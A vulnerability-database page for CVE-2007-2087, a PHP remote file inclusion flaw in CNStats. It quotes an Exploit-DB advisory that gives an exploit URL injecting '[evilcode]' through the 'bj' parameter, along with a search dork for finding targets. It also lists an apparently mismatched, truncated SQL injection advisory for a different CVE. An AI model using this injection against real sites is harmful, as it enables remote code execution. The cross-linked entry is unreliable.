CVE-2007-2087
Published 2007-04-18
Priority: P434 | Severity: medium | CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.92% (77.3th percentile)
Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cnstats | cnstats | — | — |
No detection rules found.
Exploit-DB
Softbiz Web Host Directory Script - 'host_id' SQL Injection
exploitdb · 2008-04-28 · CVE-2008-2087
---
ECHO_ADV_89$2008
[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : April, 28th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv89-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Softbiz Web Host Directory Script
version : unknown
Vendor : http://www.softbizscripts.com/web-hosting-directory-script.php
Description :
Web Ho
Exploit-DB
CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion
exploitdb · 2007-04-15 · CVE-2007-2087
---
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
bug found:
/reports/who_r.php
/reports/who_s.php
$bk = 't';
include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
# milw0rm.com [2007-04-15]
No writeups or analysis indexed.